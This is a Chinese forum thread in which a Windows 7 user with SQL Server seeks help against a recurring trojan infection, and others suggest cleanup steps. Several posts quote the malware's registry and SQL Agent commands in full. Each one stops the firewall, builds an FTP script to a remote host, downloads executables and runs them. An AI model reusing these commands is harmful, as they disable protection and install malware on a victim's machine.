求助电脑高手关于安全问题！！！电脑高手有木有

longxingxia

系统是64位WIN7
安装了MSE和360做保护
最近总是被MSE报毒和360报阻止进程创建
MSE报的是TrojanDropper:Win32/Zegost.B、Backdoor:Win32/Farfli.K、TrojanDropper:Win32/Farfli.D
总是出现在C:\WINDOWS\SYSTEM32里的一些莫名其妙的*.exe文件（记得有m.exe 123.exe rar.exe等等）
360报的是
时间    操作    说明    次数
11-04-24    自动阻止    进程创建    1
详细描述：
进程：c:\windows\sysnative\cmd.exe
动作：进程创建
路径：c:\windows\sysnative\netsh.exe
还经常报修改启动项
时间    操作    说明    次数
11-04-24    已允许    修改 开机启动项    1
详细描述：
注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\[shell]
注册表内容：c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 58.221.44.203  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q
进程：D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
今天还发现了木马
时间    操作    说明    次数
11-04-24    已清除    发现木马：Win32/Trojan.PSW.a33    1
详细描述：
木马名称：Win32/Trojan.PSW.a33
所在路径：C:\WINDOWS\SYSNATIVE\UU.EXE
可是用了MSE、MSS、大蜘蛛、360全盘扫描均扫不出病毒
不宽带连接的时候也不报毒
但是一联网一下子就出现这样的症状了
更为夸张的是今天一报毒杀之
然后注销发现多了个不认识的管理员账户（今天已经是第二次发现了）
密码未知
估计是病毒创建的
急忙删掉那个管理员账户
已经重装过了
求高手告知该怎么办

kaiki_aiolos

作为一名360黑

叫你用360！

Breeze

我告诉你最简单的办法，

1，备份重要资料
2，整个硬盘格掉，同时检查分区表
3，重装

Microsoft

一般来说重装的时候至少系统盘需要进行一次格式化
第一次进入系统之后,其他盘用右键观察一下,有无异常的(神马"运行",中文系统出现英文的open,英文系统出现中文的"打开"),千万不可双击直接打开
当然你要确保你的系统安装盘是可信无码的...

jjx01

http://www.microsoft.com/securit ... %3AWin32%2FZegost.B

病毒名称打上去用google搜……

longxingxia

看到一篇文章
遇到这样个病毒,会自动启动sql server2000的sql server agent服务,然后创建一个交x的作业,作业内容如下:
cmd /c "sc config SQLSERVERAGENT start= AUTO&net1 stop sharedaccess&echo open 122.224.54.14> cmd.txt&echo 1433>> cmd.txt&echo donw>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo get 2.exe >> cmd.txt&echo get 3.exe >> cmd.txt&echo get 4.exe >> cmd.txt&echo get 5.exe >> cmd.txt&echo get 6.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&2.exe&3.exe&4.exe&5.exe&6.exe&del cmd.txt /q /f&exit"
    可以看出,是连接远程服务器下载病毒的. 这还不是全部,紧接着还会修改注册表中系统启动项,也是开机之后运行cmd.exe,接着关闭防火墙,然后还是连远程下载病毒. 修改注册表信息如下:
注册表位置：HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\[shell]
注册表内容：c:\\windows\\system32\\cmd.exe /c net1 stop sharedaccess&echo open 218.10.16.179> cmd.txt&echo dangdong>> cmd.txt&echo fengdajj11>> cmd.txt&echo binary >> cmd.txt&echo get 11.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&11.exe&11.exe&del cmd
进程：C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe

  当然这还不是全部,下一步,他会将你的guest用户启用并且放到Administrators组下面,也会自己创建其他用户,也是在Administrators组. 并且会开启远程桌面连接.到了这一步,危险性有多么多么的大也就了然了. 但是这个病毒的隐蔽性极强,目前的杀毒软件全盘扫描都发现不了异常,只有在病毒开始运作的时候能发现下载过来的病毒,但是对罪魁祸首总是找不到.

跟我的情况很类似啊
早知道就不装SQL SERVER了

longxingxia

总算找到比较类似的解决方法了
转载自http://myeblog.3322.org/1215.html
1、这个是有一个木马造成的。
你看一下，c:/windows/system32下是否有多个64K的xml文件，还有一个隐藏的wsynalib.exe，服务里还会有一个叫Windows System Active的。
处理方法，是先删除wsynalib.exe和多个64k的xml文件，再删c:\\windows\\system32下isql文件夹，之后修改注册表HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Command Processor下AutoRun 的选项为空，然后再删掉服务Windows System Active

2、

一般出这个问题的都是拨号上网的电脑，而路由上网的电脑基本没有这个问题，办法如下
1：重新格式化C盘以及安装SQL的分区
2：安装系统，并开启WINDOWS防火墙（此时你就能看出WINDOWS防火墙的功能不是360能够替代的，那就是端口的监控和防御）
3：安装SQL并将SQL的默认1433端口修改成其它（这一步应该是最重要的）
4：设定系统密码和SA密码
问题解决，这是经过很多次的验证的，本身这是个木马，杀毒软件没有一个能查出来，查出来的都是这个木马下载下来的病毒，让你们看一下这个木马开机执行的命令，是个CMD命令 ，一般你开机看到有个DOS命令执行一下就消失了，一般都是类似的东西在作怪
c:\\windows\\system32\\cmd.exe /c net1 stop sharedaccess&echo open daoke3322.3322.org> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt
解释一下就是停止WINDOWS防火墙服务，然后从指定的地址下载病毒，然后删除日志

lokiju9988

360请乃pass掉又不是xp win7上别用它

外用V

万能方法
1、备份资料
2、重装系统
3、在重装完后第一次进入系统时检测其他硬盘隐藏文件有没有病毒残留（注意别双击），手动删除